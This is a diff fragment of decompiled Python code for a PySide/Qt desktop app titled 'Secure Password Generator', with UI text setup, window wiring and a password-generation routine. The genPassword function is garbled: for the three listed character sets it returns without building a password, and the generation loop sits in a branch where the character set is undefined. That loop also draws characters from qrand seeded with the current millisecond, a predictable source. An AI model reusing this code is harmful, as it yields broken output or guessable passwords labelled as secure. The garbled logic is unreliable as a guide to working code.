+        self.title.setHtml(QCoreApplication.translate('MainWindow', '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:\'MS Shell Dlg 2\'; font-size:8.25pt; font-weight:400; font-style:normal;">\n<p align="center" style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><span style=" font-size:20pt;">Secure Password Generator</span></p></body></html>', None))
+        self.textBrowser_2.setDocumentTitle('')
+        self.textBrowser_2.setHtml(QCoreApplication.translate('MainWindow', '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:\'MS Shell Dlg 2\'; font-size:8.25pt; font-weight:400; font-style:normal;">\n<p align="center" style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><span style=" font-size:14pt;">Password Length</span></p></body></html>', None))
+        self.generate.setText(QCoreApplication.translate('MainWindow', 'Generate!', None))
+        self.copyButton.setText(QCoreApplication.translate('MainWindow', 'Copy', None))
+        self.textBrowser_4.setDocumentTitle('')
+        self.textBrowser_4.setHtml(QCoreApplication.translate('MainWindow', '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:\'MS Shell Dlg 2\'; font-size:8.25pt; font-weight:400; font-style:normal;">\n<p align="center" style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><span style=" font-size:14pt;">Hide Password</span></p></body></html>', None))
+        self.checkBox.setText('')
+        self.comboBox.setItemText(0, QCoreApplication.translate('MainWindow', 'All Characters', None))
+        self.comboBox.setItemText(1, QCoreApplication.translate('MainWindow', 'Alphabetic', None))
+        self.comboBox.setItemText(2, QCoreApplication.translate('MainWindow', 'Alphanumeric', None))
+        self.textBrowser_5.setDocumentTitle('')
+        self.textBrowser_5.setHtml(QCoreApplication.translate('MainWindow', '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:\'MS Shell Dlg 2\'; font-size:8.25pt; font-weight:400; font-style:normal;">\n<p align="center" style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><span style=" font-size:16pt;">characters</span></p></body></html>', None))
+        self.password_field.setText('')
+
+
+class MainWindow(QMainWindow, Ui_MainWindow):
+
+    def __init__(self):
+        super(MainWindow, self).__init__()
+        self.setupUi(self)
+        self.setFixedSize(QSize(550, 400))
+        self.setWindowTitle('Secure Password Generator')
+        self.password_field.setReadOnly(True)
+        self.passlen()
+        self.chars()
+        self.hide()
+        self.gen()
+
+    def passlen(self):
+        self.PasswordLength.valueChanged.connect(self.lenpass)
+
+    def lenpass(self, l):
+        global value
+        value = l
+
+    def chars(self):
+        self.comboBox.currentIndexChanged.connect(self.charss)
+
+    def charss(self, i):
+        global index
+        index = i
+
+    def hide(self):
+        self.checkBox.stateChanged.connect(self.status)
+
+    def status(self, s):
+        global status
+        status = s == Qt.Checked
+
+    def copy(self):
+        self.copyButton.clicked.connect(self.copied)
+
+    def copied(self):
+        pyperclip.copy(self.password_field.text())
+
+    def gen(self):
+        self.generate.clicked.connect(self.genButton)
+
+    def genButton(self):
+        try:
+            hide = status
+            if hide:
+                self.password_field.setEchoMode(QLineEdit.Password)
+            else:
+                self.password_field.setEchoMode(QLineEdit.Normal)
+            password = self.genPassword()
+            self.password_field.setText(password)
+        except:
+            msg = QMessageBox()
+            msg.setWindowTitle('Warning')
+            msg.setText('Change the default values before generating passwords!')
+            x = msg.exec_()
+
+        self.copy()
+
+    def genPassword(self):
+        length = value
+        char = index
+        if char == 0:
+            charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_-+={}[]|:;<>,.?'
+        else:
+            if char == 1:
+                charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
+            else:
+                if char == 2:
+                    charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890'
+                else:
+                    try:
+                        qsrand(QTime.currentTime().msec())
+                        password = ''
+                        for i in range(length):
+                            idx = qrand() % len(charset)
+                            nchar = charset[idx]
+                            password += str(nchar)
+
+                    except:
+                        msg = QMessageBox()
+                        msg.setWindowTitle('Error')
+                        msg.setText('Error while generating password!, Send a message to the Author!')
+                        x = msg.exec_()
+
+                return password
+
+
+if __name__ == '__main__':
+    app = QtWidgets.QApplication()
+    mainwindow = MainWindow()
+    mainwindow.show()
+    app.exec_()
+# okay decompiling passwordGenerator.pyc